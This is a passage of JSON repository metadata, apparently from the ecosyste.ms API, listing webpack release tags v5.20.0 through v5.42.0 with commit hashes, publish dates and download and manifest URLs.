webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fw